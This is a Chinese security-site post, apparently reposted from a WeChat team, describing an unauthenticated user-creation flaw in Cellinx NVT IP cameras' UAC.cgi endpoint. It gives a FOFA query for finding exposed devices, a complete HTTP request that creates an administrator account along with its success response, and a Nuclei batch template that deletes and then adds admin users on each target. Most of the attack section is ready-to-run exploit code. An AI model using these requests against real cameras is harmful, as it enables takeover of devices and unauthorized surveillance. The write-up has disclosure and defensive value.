Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

admin 2024年1月22日12:06:28评论36 views字数 2190阅读7分18秒阅读模式

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞
Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

漏洞简介

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

        Cellinx NVT IP PTZ是韩国Cellinx公司的一个摄像机设备。Cellinx NVT 摄像机 UAC.cgi 接口处存在任意用户创建漏洞,未经身份认证的攻击者可利用此接口创建管理员账户。

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞
Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

漏洞复现

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法body="local/NVT-string.js"

步骤二:可构造以下数据包进行创建用户测试如成功则返回如下相应包....

POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1host:127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 194{"jsonData":{"username":"guest","password":"","option":"add_user","data":{"username":"test","password":"test","permission":{"is_admin":"1","view":"1","ptz":"1","setting":"1","dout":"1"}}}}
HTTP/1.1 200 OKSet-Cookie: TRACKID=53c5ea7529676c72bd899760e4d3c119; Path=/; Version=1Pragma: no-cacheCache-Control: no-cacheContent-type: application/jsonConnection: closeDate: Tue, 30 May 2023 13:03:43 GMTServer: lighttpd/1.4.33Content-Length: 104{"retData":{"add_user":{"result" : "Success"}}}

步骤三:使用创建的用户账号登录后台...Success!

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞
Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

批量脚本

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞
id: cellinx-nvt-uac-unauthinfo:  name: cellinx-nvt-uac-unauth  author: unknow  severity: high  description: cellinx 摄像机 uac.cgi 存在未授权添加用户漏洞。  tags: cellinx,unauth  metadata:    fofa-query: body="local/NVT-string.js"http:  - raw:      - |        POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1        Host:         Content-Type: application/json; charset=UTF-8        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        {"jsonData":{"username":"guest","password":"","option":"delete_user","data":{"username":"{{username}}"}}}      - |        POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1        Host:         Content-Type: application/json; charset=UTF-8        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        {"jsonData":{"username":"guest","password":"","option":"add_user","data":{"username":"{{username}}","password":"{{password}}","permission":{"is_admin":"1","view":"1","ptz":"1","setting":"1","dout":"1"}}}}    attack: clusterbomb          payloads:      username:        - adminqwe      password:        - adminqwe    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'status_code_2==200 && contains(body_2, "add_user":{"result" : "Success"}}}") && contains(header_2, "application/json")'

    

原文始发于微信公众号(揽月安全团队):Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月22日12:06:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cellinx 摄像机 uac.cgi 未授权添加用户漏洞http://cn-sec.com/archives/2417888.html

发表评论

匿名网友 填写信息